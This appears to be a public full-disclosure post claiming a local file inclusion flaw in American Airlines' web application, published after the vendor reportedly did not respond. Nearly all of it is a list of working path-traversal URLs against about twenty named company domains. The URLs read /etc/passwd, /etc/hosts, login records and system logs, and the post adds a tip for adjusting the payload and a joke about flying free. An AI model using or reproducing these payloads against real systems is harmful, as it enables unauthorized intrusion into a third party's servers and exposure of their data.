American Airlines' sites suffer from a local file inclusion vulnerability. The author was ignored when contacting them so this is being published.
fda78076c0e5b1cc9ca87be6898c56ce10b32556cded3690d40d24dba883f27e
American Airlines' domains have been vulnerable to Local file Include
(I wonder if anyone has flown free using this)
http://www.aa.com.do/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.aa.com.pe/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.be/aa/i18nForward.do?locale=en_GB&p=../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.ch/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.cl/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.cn/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.co.cr/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.co.uk/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.de/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.fr/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.ie/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.in/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.it/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.jp/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.american-airlines.nl/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
https://www.aa.com.ve/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../etc/passwd
https://www.americanairlines.com.au/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../etc/passwd
https://www.americanairlines.com.ru/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.flagshiplounge.net/aa/i18nForward.do?locale=en_GB&p=
http://www.premiumcustomerservices.net/aa/i18nForward.do?locale=en_GB&p=
http://www.touraa.com/aa/i18nForward.do?p=
and some senstive files i found
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/wtmpx
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/logadm.conf
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/messages
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../usr/lib/newsyslog
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../usr/sbin/logadm
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/lastlog
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/netconfig
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/syslog.conf
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/system
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/hosts
screen shots
http://i41.tinypic.com/fcns7t.jpg
http://i25.tinypic.com/359z85z.jpg
it's been reported and they don't feel like responding
(if the page doesn't work try taking off a ../)